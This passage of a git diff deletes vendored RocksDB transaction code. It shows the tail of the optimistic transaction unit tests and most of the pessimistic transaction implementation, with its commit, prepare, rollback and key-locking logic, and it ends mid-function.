-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  // Write some keys in a txn
-  s = txn->Put("B", "b");
-  ASSERT_OK(s);
-
-  s = txn->Put("H", "h");
-  ASSERT_OK(s);
-
-  s = txn->Delete("D");
-  ASSERT_OK(s);
-
-  s = txn->Put("E", "e");
-  ASSERT_OK(s);
-
-  txn->SetSnapshot();
-  const Snapshot* snapshot = txn->GetSnapshot();
-
-  // Write some keys to the db after the snapshot
-  s = db->Put(write_options, "BB", "xx");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "C", "xx");
-  ASSERT_OK(s);
-
-  read_options.snapshot = snapshot;
-  Iterator* iter = txn->GetIterator(read_options);
-  ASSERT_OK(iter->status());
-  iter->SeekToFirst();
-
-  // Read all keys via iter and lock them all
-  std::string results[] = {"a", "b", "c", "e", "f", "g", "h"};
-  for (int i = 0; i < 7; i++) {
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(results[i], iter->value().ToString());
-
-    s = txn->GetForUpdate(read_options, iter->key(), nullptr);
-    ASSERT_OK(s);
-
-    iter->Next();
-  }
-  ASSERT_FALSE(iter->Valid());
-
-  iter->Seek("G");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("g", iter->value().ToString());
-
-  iter->Prev();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("f", iter->value().ToString());
-
-  iter->Seek("D");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("e", iter->value().ToString());
-
-  iter->Seek("C");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("c", iter->value().ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("e", iter->value().ToString());
-
-  iter->Seek("");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("a", iter->value().ToString());
-
-  iter->Seek("X");
-  ASSERT_OK(iter->status());
-  ASSERT_FALSE(iter->Valid());
-
-  iter->SeekToLast();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ("h", iter->value().ToString());
-
-  // key "C" was modified in the db after txn's snapshot.  txn will not commit.
-  s = txn->Commit();
-  ASSERT_TRUE(s.IsBusy());
-
-  delete iter;
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, SavepointTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  OptimisticTransactionOptions txn_options;
-  string value;
-  Status s;
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  s = txn->RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-
-  txn->SetSavePoint();  // 1
-
-  ASSERT_OK(txn->RollbackToSavePoint());  // Rollback to beginning of txn
-  s = txn->RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Put("B", "b");
-  ASSERT_OK(s);
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b", value);
-
-  delete txn;
-  txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  s = txn->Put("A", "a");
-  ASSERT_OK(s);
-
-  s = txn->Put("B", "bb");
-  ASSERT_OK(s);
-
-  s = txn->Put("C", "c");
-  ASSERT_OK(s);
-
-  txn->SetSavePoint();  // 2
-
-  s = txn->Delete("B");
-  ASSERT_OK(s);
-
-  s = txn->Put("C", "cc");
-  ASSERT_OK(s);
-
-  s = txn->Put("D", "d");
-  ASSERT_OK(s);
-
-  ASSERT_OK(txn->RollbackToSavePoint());  // Rollback to 2
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a", value);
-
-  s = txn->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("bb", value);
-
-  s = txn->Get(read_options, "C", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("c", value);
-
-  s = txn->Get(read_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Put("A", "a");
-  ASSERT_OK(s);
-
-  s = txn->Put("E", "e");
-  ASSERT_OK(s);
-
-  // Rollback to beginning of txn
-  s = txn->RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-  txn->Rollback();
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b", value);
-
-  s = txn->Get(read_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Get(read_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Get(read_options, "E", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Put("A", "aa");
-  ASSERT_OK(s);
-
-  s = txn->Put("F", "f");
-  ASSERT_OK(s);
-
-  txn->SetSavePoint();  // 3
-  txn->SetSavePoint();  // 4
-
-  s = txn->Put("G", "g");
-  ASSERT_OK(s);
-
-  s = txn->Delete("F");
-  ASSERT_OK(s);
-
-  s = txn->Delete("B");
-  ASSERT_OK(s);
-
-  s = txn->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("aa", value);
-
-  s = txn->Get(read_options, "F", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Get(read_options, "B", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  ASSERT_OK(txn->RollbackToSavePoint());  // Rollback to 3
-
-  s = txn->Get(read_options, "F", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("f", value);
-
-  s = txn->Get(read_options, "G", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "F", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("f", value);
-
-  s = db->Get(read_options, "G", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = db->Get(read_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("aa", value);
-
-  s = db->Get(read_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b", value);
-
-  s = db->Get(read_options, "C", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = db->Get(read_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = db->Get(read_options, "E", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, UndoGetForUpdateTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  OptimisticTransactionOptions txn_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "A", "");
-
-  Transaction* txn1 = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn1);
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-
-  Transaction* txn2 = txn_db->BeginTransaction(write_options);
-  txn2->Put("A", "x");
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  // Verify that txn1 can commit since A isn't conflict checked
-  s = txn1->Commit();
-  ASSERT_OK(s);
-  delete txn1;
-
-  txn1 = txn_db->BeginTransaction(write_options);
-  txn1->Put("A", "a");
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-
-  txn2 = txn_db->BeginTransaction(write_options);
-  txn2->Put("A", "x");
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  // Verify that txn1 cannot commit since A will still be conflict checked
-  s = txn1->Commit();
-  ASSERT_TRUE(s.IsBusy());
-  delete txn1;
-
-  txn1 = txn_db->BeginTransaction(write_options);
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-
-  txn2 = txn_db->BeginTransaction(write_options);
-  txn2->Put("A", "x");
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  // Verify that txn1 cannot commit since A will still be conflict checked
-  s = txn1->Commit();
-  ASSERT_TRUE(s.IsBusy());
-  delete txn1;
-
-  txn1 = txn_db->BeginTransaction(write_options);
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-
-  txn1->UndoGetForUpdate("A");
-  txn1->UndoGetForUpdate("A");
-
-  txn2 = txn_db->BeginTransaction(write_options);
-  txn2->Put("A", "x");
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  // Verify that txn1 can commit since A isn't conflict checked
-  s = txn1->Commit();
-  ASSERT_OK(s);
-  delete txn1;
-
-  txn1 = txn_db->BeginTransaction(write_options);
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();
-  txn1->UndoGetForUpdate("A");
-
-  txn2 = txn_db->BeginTransaction(write_options);
-  txn2->Put("A", "x");
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  // Verify that txn1 cannot commit since A will still be conflict checked
-  s = txn1->Commit();
-  ASSERT_TRUE(s.IsBusy());
-  delete txn1;
-
-  txn1 = txn_db->BeginTransaction(write_options);
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-  txn1->UndoGetForUpdate("A");
-
-  txn2 = txn_db->BeginTransaction(write_options);
-  txn2->Put("A", "x");
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  // Verify that txn1 cannot commit since A will still be conflict checked
-  s = txn1->Commit();
-  ASSERT_TRUE(s.IsBusy());
-  delete txn1;
-
-  txn1 = txn_db->BeginTransaction(write_options);
-
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-
-  txn1->SetSavePoint();
-  s = txn1->GetForUpdate(read_options, "A", &value);
-  ASSERT_OK(s);
-  txn1->UndoGetForUpdate("A");
-
-  txn1->RollbackToSavePoint();
-  txn1->UndoGetForUpdate("A");
-
-  txn2 = txn_db->BeginTransaction(write_options);
-  txn2->Put("A", "x");
-  s = txn2->Commit();
-  ASSERT_OK(s);
-  delete txn2;
-
-  // Verify that txn1 can commit since A isn't conflict checked
-  s = txn1->Commit();
-  ASSERT_OK(s);
-  delete txn1;
-}
-
-namespace {
-Status OptimisticTransactionStressTestInserter(OptimisticTransactionDB* db,
-                                               const size_t num_transactions,
-                                               const size_t num_sets,
-                                               const size_t num_keys_per_set) {
-  size_t seed = std::hash<std::thread::id>()(std::this_thread::get_id());
-  Random64 _rand(seed);
-  WriteOptions write_options;
-  ReadOptions read_options;
-  OptimisticTransactionOptions txn_options;
-  txn_options.set_snapshot = true;
-
-  RandomTransactionInserter inserter(&_rand, write_options, read_options,
-                                     num_keys_per_set,
-                                     static_cast<uint16_t>(num_sets));
-
-  for (size_t t = 0; t < num_transactions; t++) {
-    bool success = inserter.OptimisticTransactionDBInsert(db, txn_options);
-    if (!success) {
-      // unexpected failure
-      return inserter.GetLastStatus();
-    }
-  }
-
-  // Make sure at least some of the transactions succeeded.  It's ok if
-  // some failed due to write-conflicts.
-  if (inserter.GetFailureCount() > num_transactions / 2) {
-    return Status::TryAgain("Too many transactions failed! " +
-                            std::to_string(inserter.GetFailureCount()) + " / " +
-                            std::to_string(num_transactions));
-  }
-
-  return Status::OK();
-}
-}  // namespace
-
-TEST_F(OptimisticTransactionTest, OptimisticTransactionStressTest) {
-  const size_t num_threads = 4;
-  const size_t num_transactions_per_thread = 10000;
-  const size_t num_sets = 3;
-  const size_t num_keys_per_set = 100;
-  // Setting the key-space to be 100 keys should cause enough write-conflicts
-  // to make this test interesting.
-
-  std::vector<port::Thread> threads;
-
-  std::function<void()> call_inserter = [&] {
-    ASSERT_OK(OptimisticTransactionStressTestInserter(
-        txn_db, num_transactions_per_thread, num_sets, num_keys_per_set));
-  };
-
-  // Create N threads that use RandomTransactionInserter to write
-  // many transactions.
-  for (uint32_t i = 0; i < num_threads; i++) {
-    threads.emplace_back(call_inserter);
-  }
-
-  // Wait for all threads to run
-  for (auto& t : threads) {
-    t.join();
-  }
-
-  // Verify that data is consistent
-  Status s = RandomTransactionInserter::Verify(db, num_sets);
-  ASSERT_OK(s);
-}
-
-TEST_F(OptimisticTransactionTest, SequenceNumberAfterRecoverTest) {
-  WriteOptions write_options;
-  OptimisticTransactionOptions transaction_options;
-
-  Transaction* transaction(txn_db->BeginTransaction(write_options, transaction_options));
-  Status s = transaction->Put("foo", "val");
-  ASSERT_OK(s);
-  s = transaction->Put("foo2", "val");
-  ASSERT_OK(s);
-  s = transaction->Put("foo3", "val");
-  ASSERT_OK(s);
-  s = transaction->Commit();
-  ASSERT_OK(s);
-  delete transaction;
-
-  Reopen();
-  transaction = txn_db->BeginTransaction(write_options, transaction_options);
-  s = transaction->Put("bar", "val");
-  ASSERT_OK(s);
-  s = transaction->Put("bar2", "val");
-  ASSERT_OK(s);
-  s = transaction->Commit();
-  ASSERT_OK(s);
-
-  delete transaction;
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(
-      stderr,
-      "SKIPPED as optimistic_transaction is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction.cc b/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction.cc
deleted file mode 100644
index 68b8b4f..0000000
--- a/thirdparty/rocksdb/utilities/transactions/pessimistic_transaction.cc
+++ /dev/null
@@ -1,595 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "utilities/transactions/pessimistic_transaction.h"
-
-#include <map>
-#include <set>
-#include <string>
-#include <vector>
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/snapshot.h"
-#include "rocksdb/status.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "util/cast_util.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "utilities/transactions/pessimistic_transaction_db.h"
-#include "utilities/transactions/transaction_util.h"
-
-namespace rocksdb {
-
-struct WriteOptions;
-
-std::atomic<TransactionID> PessimisticTransaction::txn_id_counter_(1);
-
-TransactionID PessimisticTransaction::GenTxnID() {
-  return txn_id_counter_.fetch_add(1);
-}
-
-PessimisticTransaction::PessimisticTransaction(
-    TransactionDB* txn_db, const WriteOptions& write_options,
-    const TransactionOptions& txn_options)
-    : TransactionBaseImpl(txn_db->GetRootDB(), write_options),
-      txn_db_impl_(nullptr),
-      expiration_time_(0),
-      txn_id_(0),
-      waiting_cf_id_(0),
-      waiting_key_(nullptr),
-      lock_timeout_(0),
-      deadlock_detect_(false),
-      deadlock_detect_depth_(0) {
-  txn_db_impl_ =
-      static_cast_with_check<PessimisticTransactionDB, TransactionDB>(txn_db);
-  db_impl_ = static_cast_with_check<DBImpl, DB>(db_);
-  Initialize(txn_options);
-}
-
-void PessimisticTransaction::Initialize(const TransactionOptions& txn_options) {
-  txn_id_ = GenTxnID();
-
-  txn_state_ = STARTED;
-
-  deadlock_detect_ = txn_options.deadlock_detect;
-  deadlock_detect_depth_ = txn_options.deadlock_detect_depth;
-  write_batch_.SetMaxBytes(txn_options.max_write_batch_size);
-
-  lock_timeout_ = txn_options.lock_timeout * 1000;
-  if (lock_timeout_ < 0) {
-    // Lock timeout not set, use default
-    lock_timeout_ =
-        txn_db_impl_->GetTxnDBOptions().transaction_lock_timeout * 1000;
-  }
-
-  if (txn_options.expiration >= 0) {
-    expiration_time_ = start_time_ + txn_options.expiration * 1000;
-  } else {
-    expiration_time_ = 0;
-  }
-
-  if (txn_options.set_snapshot) {
-    SetSnapshot();
-  }
-
-  if (expiration_time_ > 0) {
-    txn_db_impl_->InsertExpirableTransaction(txn_id_, this);
-  }
-}
-
-PessimisticTransaction::~PessimisticTransaction() {
-  txn_db_impl_->UnLock(this, &GetTrackedKeys());
-  if (expiration_time_ > 0) {
-    txn_db_impl_->RemoveExpirableTransaction(txn_id_);
-  }
-  if (!name_.empty() && txn_state_ != COMMITED) {
-    txn_db_impl_->UnregisterTransaction(this);
-  }
-}
-
-void PessimisticTransaction::Clear() {
-  txn_db_impl_->UnLock(this, &GetTrackedKeys());
-  TransactionBaseImpl::Clear();
-}
-
-void PessimisticTransaction::Reinitialize(
-    TransactionDB* txn_db, const WriteOptions& write_options,
-    const TransactionOptions& txn_options) {
-  if (!name_.empty() && txn_state_ != COMMITED) {
-    txn_db_impl_->UnregisterTransaction(this);
-  }
-  TransactionBaseImpl::Reinitialize(txn_db->GetRootDB(), write_options);
-  Initialize(txn_options);
-}
-
-bool PessimisticTransaction::IsExpired() const {
-  if (expiration_time_ > 0) {
-    if (db_->GetEnv()->NowMicros() >= expiration_time_) {
-      // Transaction is expired.
-      return true;
-    }
-  }
-
-  return false;
-}
-
-WriteCommittedTxn::WriteCommittedTxn(TransactionDB* txn_db,
-                                     const WriteOptions& write_options,
-                                     const TransactionOptions& txn_options)
-    : PessimisticTransaction(txn_db, write_options, txn_options){};
-
-Status WriteCommittedTxn::CommitBatch(WriteBatch* batch) {
-  TransactionKeyMap keys_to_unlock;
-  Status s = LockBatch(batch, &keys_to_unlock);
-
-  if (!s.ok()) {
-    return s;
-  }
-
-  bool can_commit = false;
-
-  if (IsExpired()) {
-    s = Status::Expired();
-  } else if (expiration_time_ > 0) {
-    TransactionState expected = STARTED;
-    can_commit = std::atomic_compare_exchange_strong(&txn_state_, &expected,
-                                                     AWAITING_COMMIT);
-  } else if (txn_state_ == STARTED) {
-    // lock stealing is not a concern
-    can_commit = true;
-  }
-
-  if (can_commit) {
-    txn_state_.store(AWAITING_COMMIT);
-    s = db_->Write(write_options_, batch);
-    if (s.ok()) {
-      txn_state_.store(COMMITED);
-    }
-  } else if (txn_state_ == LOCKS_STOLEN) {
-    s = Status::Expired();
-  } else {
-    s = Status::InvalidArgument("Transaction is not in state for commit.");
-  }
-
-  txn_db_impl_->UnLock(this, &keys_to_unlock);
-
-  return s;
-}
-
-Status PessimisticTransaction::Prepare() {
-  Status s;
-
-  if (name_.empty()) {
-    return Status::InvalidArgument(
-        "Cannot prepare a transaction that has not been named.");
-  }
-
-  if (IsExpired()) {
-    return Status::Expired();
-  }
-
-  bool can_prepare = false;
-
-  if (expiration_time_ > 0) {
-    // must concern ourselves with expiraton and/or lock stealing
-    // need to compare/exchange bc locks could be stolen under us here
-    TransactionState expected = STARTED;
-    can_prepare = std::atomic_compare_exchange_strong(&txn_state_, &expected,
-                                                      AWAITING_PREPARE);
-  } else if (txn_state_ == STARTED) {
-    // expiration and lock stealing is not possible
-    can_prepare = true;
-  }
-
-  if (can_prepare) {
-    txn_state_.store(AWAITING_PREPARE);
-    // transaction can't expire after preparation
-    expiration_time_ = 0;
-    s = PrepareInternal();
-    if (s.ok()) {
-      assert(log_number_ != 0);
-      dbimpl_->MarkLogAsContainingPrepSection(log_number_);
-      txn_state_.store(PREPARED);
-    }
-  } else if (txn_state_ == LOCKS_STOLEN) {
-    s = Status::Expired();
-  } else if (txn_state_ == PREPARED) {
-    s = Status::InvalidArgument("Transaction has already been prepared.");
-  } else if (txn_state_ == COMMITED) {
-    s = Status::InvalidArgument("Transaction has already been committed.");
-  } else if (txn_state_ == ROLLEDBACK) {
-    s = Status::InvalidArgument("Transaction has already been rolledback.");
-  } else {
-    s = Status::InvalidArgument("Transaction is not in state for commit.");
-  }
-
-  return s;
-}
-
-Status WriteCommittedTxn::PrepareInternal() {
-  WriteOptions write_options = write_options_;
-  write_options.disableWAL = false;
-  WriteBatchInternal::MarkEndPrepare(GetWriteBatch()->GetWriteBatch(), name_);
-  Status s =
-      db_impl_->WriteImpl(write_options, GetWriteBatch()->GetWriteBatch(),
-                          /*callback*/ nullptr, &log_number_, /*log ref*/ 0,
-                          /* disable_memtable*/ true);
-  return s;
-}
-
-Status PessimisticTransaction::Commit() {
-  Status s;
-  bool commit_without_prepare = false;
-  bool commit_prepared = false;
-
-  if (IsExpired()) {
-    return Status::Expired();
-  }
-
-  if (expiration_time_ > 0) {
-    // we must atomicaly compare and exchange the state here because at
-    // this state in the transaction it is possible for another thread
-    // to change our state out from under us in the even that we expire and have
-    // our locks stolen. In this case the only valid state is STARTED because
-    // a state of PREPARED would have a cleared expiration_time_.
-    TransactionState expected = STARTED;
-    commit_without_prepare = std::atomic_compare_exchange_strong(
-        &txn_state_, &expected, AWAITING_COMMIT);
-    TEST_SYNC_POINT("TransactionTest::ExpirableTransactionDataRace:1");
-  } else if (txn_state_ == PREPARED) {
-    // expiration and lock stealing is not a concern
-    commit_prepared = true;
-  } else if (txn_state_ == STARTED) {
-    // expiration and lock stealing is not a concern
-    commit_without_prepare = true;
-    // TODO(myabandeh): what if the user mistakenly forgets prepare? We should
-    // add an option so that the user explictly express the intention of
-    // skipping the prepare phase.
-  }
-
-  if (commit_without_prepare) {
-    assert(!commit_prepared);
-    if (WriteBatchInternal::Count(GetCommitTimeWriteBatch()) > 0) {
-      s = Status::InvalidArgument(
-          "Commit-time batch contains values that will not be committed.");
-    } else {
-      txn_state_.store(AWAITING_COMMIT);
-      s = CommitWithoutPrepareInternal();
-      Clear();
-      if (s.ok()) {
-        txn_state_.store(COMMITED);
-      }
-    }
-  } else if (commit_prepared) {
-    txn_state_.store(AWAITING_COMMIT);
-
-    s = CommitInternal();
-
-    if (!s.ok()) {
-      ROCKS_LOG_WARN(db_impl_->immutable_db_options().info_log,
-                     "Commit write failed");
-      return s;
-    }
-
-    // FindObsoleteFiles must now look to the memtables
-    // to determine what prep logs must be kept around,
-    // not the prep section heap.
-    assert(log_number_ > 0);
-    dbimpl_->MarkLogAsHavingPrepSectionFlushed(log_number_);
-    txn_db_impl_->UnregisterTransaction(this);
-
-    Clear();
-    txn_state_.store(COMMITED);
-  } else if (txn_state_ == LOCKS_STOLEN) {
-    s = Status::Expired();
-  } else if (txn_state_ == COMMITED) {
-    s = Status::InvalidArgument("Transaction has already been committed.");
-  } else if (txn_state_ == ROLLEDBACK) {
-    s = Status::InvalidArgument("Transaction has already been rolledback.");
-  } else {
-    s = Status::InvalidArgument("Transaction is not in state for commit.");
-  }
-
-  return s;
-}
-
-Status WriteCommittedTxn::CommitWithoutPrepareInternal() {
-  Status s = db_->Write(write_options_, GetWriteBatch()->GetWriteBatch());
-  return s;
-}
-
-Status WriteCommittedTxn::CommitInternal() {
-  // We take the commit-time batch and append the Commit marker.
-  // The Memtable will ignore the Commit marker in non-recovery mode
-  WriteBatch* working_batch = GetCommitTimeWriteBatch();
-  WriteBatchInternal::MarkCommit(working_batch, name_);
-
-  // any operations appended to this working_batch will be ignored from WAL
-  working_batch->MarkWalTerminationPoint();
-
-  // insert prepared batch into Memtable only skipping WAL.
-  // Memtable will ignore BeginPrepare/EndPrepare markers
-  // in non recovery mode and simply insert the values
-  WriteBatchInternal::Append(working_batch, GetWriteBatch()->GetWriteBatch());
-
-  auto s = db_impl_->WriteImpl(write_options_, working_batch, nullptr, nullptr,
-                               log_number_);
-  return s;
-}
-
-Status WriteCommittedTxn::Rollback() {
-  Status s;
-  if (txn_state_ == PREPARED) {
-    WriteBatch rollback_marker;
-    WriteBatchInternal::MarkRollback(&rollback_marker, name_);
-    txn_state_.store(AWAITING_ROLLBACK);
-    s = db_impl_->WriteImpl(write_options_, &rollback_marker);
-    if (s.ok()) {
-      // we do not need to keep our prepared section around
-      assert(log_number_ > 0);
-      dbimpl_->MarkLogAsHavingPrepSectionFlushed(log_number_);
-      Clear();
-      txn_state_.store(ROLLEDBACK);
-    }
-  } else if (txn_state_ == STARTED) {
-    // prepare couldn't have taken place
-    Clear();
-  } else if (txn_state_ == COMMITED) {
-    s = Status::InvalidArgument("This transaction has already been committed.");
-  } else {
-    s = Status::InvalidArgument(
-        "Two phase transaction is not in state for rollback.");
-  }
-
-  return s;
-}
-
-Status PessimisticTransaction::RollbackToSavePoint() {
-  if (txn_state_ != STARTED) {
-    return Status::InvalidArgument("Transaction is beyond state for rollback.");
-  }
-
-  // Unlock any keys locked since last transaction
-  const std::unique_ptr<TransactionKeyMap>& keys =
-      GetTrackedKeysSinceSavePoint();
-
-  if (keys) {
-    txn_db_impl_->UnLock(this, keys.get());
-  }
-
-  return TransactionBaseImpl::RollbackToSavePoint();
-}
-
-// Lock all keys in this batch.
-// On success, caller should unlock keys_to_unlock
-Status PessimisticTransaction::LockBatch(WriteBatch* batch,
-                                         TransactionKeyMap* keys_to_unlock) {
-  class Handler : public WriteBatch::Handler {
-   public:
-    // Sorted map of column_family_id to sorted set of keys.
-    // Since LockBatch() always locks keys in sorted order, it cannot deadlock
-    // with itself.  We're not using a comparator here since it doesn't matter
-    // what the sorting is as long as it's consistent.
-    std::map<uint32_t, std::set<std::string>> keys_;
-
-    Handler() {}
-
-    void RecordKey(uint32_t column_family_id, const Slice& key) {
-      std::string key_str = key.ToString();
-
-      auto iter = (keys_)[column_family_id].find(key_str);
-      if (iter == (keys_)[column_family_id].end()) {
-        // key not yet seen, store it.
-        (keys_)[column_family_id].insert({std::move(key_str)});
-      }
-    }
-
-    virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& /* unused */) override {
-      RecordKey(column_family_id, key);
-      return Status::OK();
-    }
-    virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                           const Slice& /* unused */) override {
-      RecordKey(column_family_id, key);
-      return Status::OK();
-    }
-    virtual Status DeleteCF(uint32_t column_family_id,
-                            const Slice& key) override {
-      RecordKey(column_family_id, key);
-      return Status::OK();
-    }
-  };
-
-  // Iterating on this handler will add all keys in this batch into keys
-  Handler handler;
-  batch->Iterate(&handler);
-
-  Status s;
-
-  // Attempt to lock all keys
-  for (const auto& cf_iter : handler.keys_) {
-    uint32_t cfh_id = cf_iter.first;
-    auto& cfh_keys = cf_iter.second;
-
-    for (const auto& key_iter : cfh_keys) {
-      const std::string& key = key_iter;
-
-      s = txn_db_impl_->TryLock(this, cfh_id, key, true /* exclusive */);
-      if (!s.ok()) {
-        break;
-      }
-      TrackKey(keys_to_unlock, cfh_id, std::move(key), kMaxSequenceNumber,
-               false, true /* exclusive */);
-    }
-
-    if (!s.ok()) {
-      break;
-    }
-  }
-
-  if (!s.ok()) {
-    txn_db_impl_->UnLock(this, keys_to_unlock);
-  }
-
-  return s;
-}
-
-// Attempt to lock this key.
-// Returns OK if the key has been successfully locked.  Non-ok, otherwise.
-// If check_shapshot is true and this transaction has a snapshot set,
-// this key will only be locked if there have been no writes to this key since
-// the snapshot time.
-Status PessimisticTransaction::TryLock(ColumnFamilyHandle* column_family,
-                                       const Slice& key, bool read_only,
-                                       bool exclusive, bool untracked) {
-  uint32_t cfh_id = GetColumnFamilyID(column_family);
-  std::string key_str = key.ToString();
-  bool previously_locked;
-  bool lock_upgrade = false;
-  Status s;
-
-  // lock this key if this transactions hasn't already locked it
-  SequenceNumber current_seqno = kMaxSequenceNumber;
-  SequenceNumber new_seqno = kMaxSequenceNumber;
-
-  const auto& tracked_keys = GetTrackedKeys();
-  const auto tracked_keys_cf = tracked_keys.find(cfh_id);
-  if (tracked_keys_cf == tracked_keys.end()) {
-    previously_locked = false;
-  } else {
-    auto iter = tracked_keys_cf->second.find(key_str);
-    if (iter == tracked_keys_cf->second.end()) {
-      previously_locked = false;
-    } else {
-      if (!iter->second.exclusive && exclusive) {
-        lock_upgrade = true;
-      }
-      previously_locked = true;
-      current_seqno = iter->second.seq;
-    }
-  }
-
-  // Lock this key if this transactions hasn't already locked it or we require
-  // an upgrade.
-  if (!previously_locked || lock_upgrade) {
-    s = txn_db_impl_->TryLock(this, cfh_id, key_str, exclusive);
-  }
-
-  SetSnapshotIfNeeded();
-
-  // Even though we do not care about doing conflict checking for this write,
-  // we still need to take a lock to make sure we do not cause a conflict with
-  // some other write.  However, we do not need to check if there have been
-  // any writes since this transaction's snapshot.
-  // TODO(agiardullo): could optimize by supporting shared txn locks in the
-  // future
-  if (untracked || snapshot_ == nullptr) {
-    // Need to remember the earliest sequence number that we know that this
-    // key has not been modified after.  This is useful if this same
-    // transaction
-    // later tries to lock this key again.
-    if (current_seqno == kMaxSequenceNumber) {
-      // Since we haven't checked a snapshot, we only know this key has not
-      // been modified since after we locked it.
-      new_seqno = db_->GetLatestSequenceNumber();
-    } else {
-      new_seqno = current_seqno;
-    }
-  } else {
-    // If a snapshot is set, we need to make sure the key hasn't been modified
-    // since the snapshot.  This must be done after we locked the key.
-    if (s.ok()) {
-      s = ValidateSnapshot(column_family, key, current_seqno, &new_seqno);
-
-      if (!s.ok()) {
-        // Failed to validate key
-        if (!previously_locked) {
-          // Unlock key we just locked
